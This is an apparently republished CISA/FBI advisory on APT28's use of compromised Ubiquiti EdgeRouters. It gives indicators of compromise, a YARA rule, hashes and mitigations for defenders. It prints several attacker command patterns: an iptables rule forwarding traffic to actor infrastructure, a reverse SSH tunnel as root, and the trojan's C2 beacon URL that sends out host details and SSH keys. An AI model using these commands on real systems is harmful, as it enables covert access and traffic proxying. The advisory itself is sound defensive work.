X-Industry

CISA Report JCSA-20240227-001

Note: This CISA advisory uses the MITRE ATT&CK® for Enterprise framework, version 14.  See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview - This advisory provides observed tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and recommendations to mitigate the threat posed by APT28 threat actors related to compromised EdgeRouters.  Given the global popularity of EdgeRouters, the FBI and its international partners urge EdgeRouter network defenders and users to apply immediately the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents associated with APT28 activity.

Ubiquiti EdgeRouters have a user-friendly, Linux-based operating system that makes them popular for both consumers and malicious cyber actors.  EdgeRouters are often shipped with default credentials and limited to no firewall protections to accommodate wireless internet service providers (WISPs).  Additionally, EdgeRouters do not automatically update firmware unless a consumer configures them to do so.

Threat Actor Activity - As early as 2022, APT28 actors had utilized compromised EdgeRouters to facilitate covert cyber operations against governments, militaries, and organizations around the world.  These operations have targeted various industries, including Aerospace & Defense, Education, Energy & Utilities, Governments, Hospitality, Manufacturing, Oil & Gas, Retail, Technology, and Transportation.

Targeted countries include Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and the US[1][2]. Additionally, the actors have strategically targeted many individuals in Ukraine.

An FBI investigation revealed APT28 actors accessed EdgeRouters compromised by Moobot, a botnet that installs OpenSSH trojans on compromised hardware [T1588].  While the compromise of EdgeRouters has been documented in open-source reporting, FBI investigation revealed each compromised router accessed by APT28 actors housed a collection of Bash scripts and ELF binaries designed to exploit backdoor OpenSSH daemons and related services [T1546] for a variety of purposes.

APT28 actors have used compromised EdgeRouters to collect credentials, proxy network traffic, and host spoofed landing pages and custom post-exploitation tools. For example, in early 2023, APT28 actors authored custom Python scripts to collect account credentials for specifically targeted webmail users.  APT28 actors uploaded these custom Python scripts [T1587] to a subset of compromised Ubiquiti routers to validate stolen webmail account credentials collected via cross-site scripting and browser-in-the-browser spear-phishing campaigns [T1566].

Additionally, an FBI investigation revealed that as early as 2022, APT28 actors had exploited CVE[1]2023-23397, a zero-day vulnerability at the time, to collect NTLMv2 digests from targeted Outlook accounts [T1203].  Per a Microsoft blog post[3] published in March 2023, CVE-2023-23397 is a critical elevation of privilege vulnerability in Microsoft Outlook on Windows wherein Net-NTLMv2 hashes are leaked to actor-controlled infrastructure [T1119, T1020].  Despite Microsoft releasing a patch for the vulnerability, FBI investigation revealed APT28 actors have continued to exploit CVE-2023-23397 to leak NTLM digests to actor controlled infrastructure. APT28 actors have installed publicly available tools such as Impacket ntlmrelayx.py[4] and Responder[5] on compromised Ubiquiti routers to execute NTLM relay attacks [T1557] and host NTLMv2 rogue authentication servers [T1556].

In summary, with root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns.

Indicators of Compromise - The FBI identified IOCs for the Moobot OpenSSH trojan and for APT28 activity on EdgeRouters.  Readers of this CSA can reference the observations below to determine if their EdgeRouters have been impacted by either party.

Moobot OpenSSH Trojan - APT28 actors have leveraged default credentials and trojanized OpenSSH server processes to access EdgeRouters.  Trojanized OpenSSH server processes are associated with Moobot, a Mirai[1]based botnet that infects internet of things (IoT) devices using remotely exploitable vulnerabilities, such as weak or default passwords.  Trojanized OpenSSH server binaries downloaded from packinstall[.]kozow[.]com replaced legitimate binaries on EdgeRouters accessed by APT28, allowing remote attackers to bypass authentication.

Credential Access via Python Scripts - APT28 actors have hosted custom Python scripts on compromised EdgeRouters to collect and validate stolen webmail account credentials.  The scripts are typically stored alongside related log files in the home directory of a compromised user, e.g., /home/<compromised user>/srv/core.py and

/home/<compromised user>/srv/debug.txt.  The FBI has recovered verbose log files with information about APT28 activity on EdgeRouters.

File name: SHA-256
core.py E32B04930D1F745EBA92255EE1C5E5AC82B939FF12DE0522C8A4905431D033D

core.py C51C6AA0230A2FEA888EBCD213D302F1CC9F6051FDB268AE5C7A09415845C404

Network defenders can use the FBI-created Yara rule below to locate credential collection scripts on compromised EdgeRouters.  Additionally, they can query network traffic for connections with API endpoint api[.]anti-captcha[.]com, which APT28 actors use in their custom Python scripts to automatically break captcha problems on webmail login pages.

rule APT28_core_scripts {

strings:

 $a = "make_response('BAD')"

 $b = "make_response('Finaly')"

 $c = "make_response('NOOP')"

 $d = "api.anti-captcha.com"

 $e = "messages/remove"

 $f = "acbb64c3de5ea5e5936df4a1eecf1235"

Condition:

5 of them

}

Exploitation of CVE-2023-23397 - APT28 actors have used ntlmrelayx.py and Responder to facilitate NTMLv2 credential leaks via exploitation of CVE-2023-23397 as a zero-day vulnerability since early 2022.  The FBI collected evidence of APT28 CVE-2023-23397 activity on numerous compromised EdgeRouters.  With default configurations, Responder logs activity to the following files:

- Responder-Session.log, and

- Responder.db.

Network defenders and users can search EdgeRouters for tooling associated with ntlmrelayx.py and Responder to identify APT28 activity.

Proxy and Tunnel Infrastructure - APT28 actors have used iptables rules on EdgeRouters to establish reverse proxy connections to dedicated infrastructure. Readers of this CSA can review iptables chains and Bash histories on EdgeRouters for unusual invocations like the example provided below.

iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -

j DNAT -to-destination <APT28 dedicated infrastructure>:10081

Additionally, APT28 actors have uploaded adversary-controlled SSH RSA keys to compromised EdgeRouters to establish reverse SSH tunnels and access compromised devices.  Readers of this CSA can review /root/.ssh/ and other .ssh/ directories under /home/ for unknown RSA keys, which adversaries have used to access EdgeRouters despite password changes.  Readers can also query network traffic logs on EdgeRouters to identify abnormal SSH sessions.  An invocation of a reverse SSH tunnel used by APT28 actors is included below.

ssh –i <RSA key> -p <port> root@<router IP address> -R <router IP address>:<port>

MASEPIE Malware - In December 2023, APT28 actors wrote MASEPIE[6], a small Python backdoor capable of executing arbitrary commands on victim machines.  An FBI investigation revealed that on more than one occasion, APT28 used compromised Ubiquiti EdgeRouters as command-and-control infrastructure for MASEPIE backdoors deployed against targets.  Data sent to and from the EdgeRouters was encrypted using a randomly generated 16-character AES key. It is important to note that APT28 does not deploy MASEPIE on EdgeRouters, but rather on systems belonging to targeted individuals and organizations.

SHA-256 for MASEPIE backdoors

40a7fd89b9e51b0a515ac2355036d203357be90a2200b9c506b95c12db54c7aa

18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6

0429bdc6a302b4288aea1b1e2f2a7545731c50d647672fa65b012b2a2caa386e

DETECTION - To locate related, malicious files on EdgeRouters, search Bash histories of all users for file downloads from domain packinstall[.]kozow[.]com, query network traffic for connections with domain packinstall[.]kozow[.]com, and reference the file hash table below to locate artifacts on disk.

Additionally, if directory /usr/lib/libu.a/ exists on an EdgeRouter, it is likely an infection occurred.

File path SHA-256

/usr/sbin/cl 3B5ED45345193B06F40515DA342FF146267E8340B2E1AB6D55A257D2E3554A2B

/usr/sbin/cl ADAE1BD8938B9A0D825A2EF7E7C4E000F01966C397306027119F20D7ECCE955D

/usr/sbin/cts C09F8D0A9FA0F9BB3E19556182A95782DAEC2F2F532CAB5EEB5528F2CD783583

/usr/sbin/env 1CC20155517860557C94308EC913E4C3BFC072C34CE33449641CC9FB1D571B21

/usr/sbin/events 551EB82D82B7A8830549C9183EB39ACF19719C84B9BCCC7FB443504B093F6BB9

/usr/sbin/events CD83DD9470603B1A1951EEFA95B602E34207C4D5E62C649642E7160574A9C50D

/usr/sbin/events FBC2E6820C874ED102BAB304382EDEFFB9708E7B8445E126C227A6C289D92708

/usr/sbin/ptty C9E06C7C62395DA32C91CC0C4ACB95F29A0AA3380A833E7C7B24B8D4DB50C0C6

/usr/sbin/ptty 5FACBE53B4C63DBC865F3713385358DF490A4BAD9211337241D85F0554CCA40A

/usr/sbin/ptty C7C40CDCDD65E468EE29D330A34E8EE94C26AA8B3F1830E0A8DFEA8ACA3CDD50

/usr/sbin/sshd A4A95807F1C5B200D5D94E3E811A7C4AF2D0D9CA88CA4D7F9D02015574F4716F

/usr/sbin/sshd 104E3EA9A190BA039488F5200824FE883B98F6FE01D05A1B55E15ED2199C807A

Some versions of the OpenSSH trojan create malicious users systemd and systemx in /etc/shadow and /etc/passwd on infected EdgeRouters.  The trojan also introduces an OpenDNS server IP address in /etc/resolv.conf, 208[.]67[.]220[.]222, and a user-land process named .kworker to masquerade as a legitimate kernel thread.

Network defenders can also query network traffic for connections with the following domains, which were identified by the FBI and are associated with the OpenSSH trojan.  HTTP beacons to these domains follow the form provided after the list.

- matbaiteahe[.]mooo[.]com

- lalapoc[.]kozow[.]com

- gneivaientga[.]ignorelist[.]com

- antotehlant[.]theworkpc[.]com

- onechoice[.]gleeze[.]com

- mumucnc[.]kozow[.]com

<C2_DOMAIN>/srv.php?type=${type}&ip=${ip}&sshd_port=${sshd_port}&sshd_backup_missing=${sshd_backup_missing}&sshkey=${SSHKEY}&ptty_ver=${ptty_ver}&ctry=${CTRY}&id_unic=${id_unic}&os=${os}&arch=${arch}&kernel=${kernel}&upt=${upt}&serverspeed=${serverspeed}&lan=${lan}&lan_ip=${lan_ip}&rk_date=${rk_date}&socks_value=${socks_value}

EdgeRouters compromised by the OpenSSH trojan display a unique SSH identification string, SSH[1]2.0-OpenSSH_6.7p2.  Use Netcat or similar tools to collect identification strings from EdgeRouters and other hardware to locate infections.

(local) $ nc <IP address of EdgeRouter> <SSH listening port on EdgeRouter>

SSH-2.0-OpenSSH_6.7p2 # this version indicates infection.

Additionally, query repositories of banners collected from internet hosts, e.g., Shodan or Censys, to locate EdgeRouters infected by the OpenSSH trojan.  An example Censys query is provided below.

The EdgeOS portion of the query can be negated to return other types of devices infected by the trojan.

services.software.uniform_resource_identifier: `cpe:2.3:a:openbsd:openssh:6.7p2*`

and

services.software.uniform_resource_identifier: `cpe:2.3:o:ui:edgeos*`

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 1-7 for all referenced threat actor tactics and techniques in this advisory.

MITIGATIONS - Rebooting a compromised EdgeRouter will not remove the existing malware of concern, if present.  The FBI and its partners recommend the following steps be taken to remediate compromised EdgeRouters:

1. Perform a hardware factory reset to flush file systems of malicious files,
2. Upgrade to the latest firmware version,
3. Change any default usernames and passwords, and

4.Implement strategic firewall rules on WAN-side interfaces to prevent the unwanted exposure of remote management services.

Additionally, all network owners should keep their operating systems, software, and firmware up to date.  Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. For CVE-2023-23397, updating Microsoft Outlook mitigates the vulnerability.  To mitigate other forms of NTLM relay, all network owners should consider disabling NTLM when feasible, or enabling server signing and Extended Protection for Authentication configurations.

Further, for longer term mitigations, network owners should prioritize only using routers and other equipment incorporating secure-by-design principles that eliminate default passwords and SOHO router defects.

This article is shared at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941 

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5993554863383553632